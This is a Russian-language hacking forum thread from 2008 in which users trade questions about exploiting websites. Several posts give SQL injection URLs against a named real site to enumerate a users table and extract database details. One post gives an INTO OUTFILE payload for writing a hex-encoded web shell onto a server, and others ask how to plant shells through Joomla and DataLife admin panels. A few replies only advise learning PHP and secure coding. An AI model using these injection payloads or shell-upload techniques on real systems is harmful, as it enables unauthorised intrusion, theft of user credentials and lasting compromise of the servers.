Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. cheb

    cheb Elder - Старейшина

    Joined:
    31 Jul 2006
    Messages:
    42
    Likes Received:
    12
    Reputations:
    0
    спасибо за мега шустрый ответ :))))
     
  2. MaSter GeN

    MaSter GeN Elder - Старейшина

    Joined:
    26 Jan 2008
    Messages:
    52
    Likes Received:
    31
    Reputations:
    0
    вообшем такая проблема нашел скуль в 2х в разных параметрах на одном сайте в одном есть полные отсчеты обшибках но нет вывода на экран в другом нету отсчета но есть вывод на экран
    вотс первый
    Code:
    http://www.revolution.co.uk/_forum.php?neuron=1 union select null,null,null,null,null,null,null,null,null,null,null,null,null from users/*
    
    проходит без ошибок то есть таблица "users" существует ;)
    во втором
    запрос вида
    Code:
    http://www.revolution.co.uk/_forum.php?neuron=1&topic=4981&message=-58008 union select 1,aes_decrypt(aes_encrypt(version(),0x71), 0x71),3,aes_decrypt(aes_encrypt(user(),0x71), 0x71),aes_decrypt(aes_encrypt(database(),0x71), 0x71),6,7,8,9/*
    
    выдает user,version,database а вот на from userS материться оч интересно почему ?
     
  3. brasco2k

    brasco2k Elder - Старейшина

    Joined:
    23 Nov 2007
    Messages:
    258
    Likes Received:
    91
    Reputations:
    0
    как загрузить r57 через mysql inj


    index.php?p=-1+union+select+1,password,3,4,5,6,7,8+from+users/*

    это типа пароль узнать, а как шелл загрузить?
     
  4. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    index.php?p=-1+UNION+SELECT+null, тут код шелла в bin2hex ,null,null,null,null+from+accounts+into+outfile+'/tmp/aaa.php'/*

    так, если конечно инто_аутфаил разрешён...
     
    1 person likes this.
  5. brasco2k

    brasco2k Elder - Старейшина

    Joined:
    23 Nov 2007
    Messages:
    258
    Likes Received:
    91
    Reputations:
    0
    Забыл сказать сервер виндовый
     
    3 people like this.
  6. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,192
    Reputations:
    430
    Какая разница...
    https://forum.antichat.ru/threadnav34338-1-10.html
     
  7. XaCeRoC

    XaCeRoC Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    62
    Likes Received:
    23
    Reputations:
    -12
    Скажите как залить шелл через админку в Joomla(Версия 1.0.1.2)?!
    за ранее спс:)
     
  8. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    XaCeRoC
    _http://forum.antichat.ru/thread50600.html
     
  9. ty13r

    ty13r Elder - Старейшина

    Joined:
    18 Jul 2007
    Messages:
    39
    Likes Received:
    2
    Reputations:
    0
    Подскажите плиз как залить шелл в админке Datalife версия 6.7
     
    1 person likes this.
  10. ty13r

    ty13r Elder - Старейшина

    Joined:
    18 Jul 2007
    Messages:
    39
    Likes Received:
    2
    Reputations:
    0
    Через че вообще пытаться залить? Через рисунки не получается.
     
    #1990 ty13r, 21 May 2008
    Last edited: 21 May 2008
  11. Ershik

    Ershik Elder - Старейшина

    Joined:
    7 Nov 2007
    Messages:
    301
    Likes Received:
    46
    Reputations:
    6
    Правильно ли я понимаю, что здесь иньекция используется после LIMIT и сделать ничего нельзя?
     
  12. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Задался вопросом научиться искать уязвимости в исходниках. Есть ли среди вас сансеи ))
    Большая прозьба: не посылать учить языки программирования. На мой взгляд это не обязательно, достаточно уметь читать код(могу ошибаться :)) Может кто подскажет или даст на расмотрение несколько наверняка уязвимых скриптов с комментариями?или ссылки на статьи по теме. Ну или... вам виднее.
     
  13. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    samarin, как ты можешь найти уязвимость в коде, не зная языка? учи язык и всё.
     
  14. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    ок. Но одним языком сыт не будешь. Нужно понять принцип нахождения уязвимостей. Ведь взять для примера людей, которые хорошо знают язык, пишут всякие cms, форумы и т.д. Но сами они, в большинстве, не могут находить уязвимости.
    -------------------------------------------------------------
    читать код можно не умея программировать.
    -------------------------------------------------------------
    Я очень быстро учусь чему-то(если хорошо подсказывают )). И мне важно понять принцип.
     
  15. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    ну-ну. А ты умеешь говорить по испански, незная ниодного испанского слова?

    Учи PHP для начала
     
  16. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Spyder - разве я сказал, что не знаю пхп?
    Я знаю пхп на уровне ... второго класса )) (могу ,более менее, читать код) - это как испанский со словарем ))
    --------------------------------------------------------------
    если это и есть ответ на мой вопрос, что ж буду грызть книги по php :D
     
  17. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    samarin, просто ты не поймешь почему уязвимость именно тут, и почему это уязвимость и как оно вообще работает, не зная языка. А если просто показать пару шаблонов, то так и будешь "подставлять кавычку" )) Вообщем, надо учить язык, ты это уже и так понял и Spyder ещё сказал)
     
    2 people like this.
  18. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    n0ne - Да, спасибо! Как повышу свой уровень знаний пхп обязательно подниму тему еще раз.
    ------------------------
    какие книги на ваш взгляд самые удачные, чтобы начать детальное(а главное правильное)изучение языка?
     
  19. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    samarin, www.intuit.ru - там есть довольно неплохие курсы по php. А потом читай статьи и книги по безопасному программированию на php и была неплохая книженция "php глазами хакера", если не ошибаюсь.
     
  20. Александр Логинов

    Joined:
    22 May 2008
    Messages:
    6
    Likes Received:
    4
    Reputations:
    -5
    samarin, подставляй ковычки в конце адресной строки пока не увидишь надпись MySQL Syntax Error
     
Thread Status:
Not open for further replies.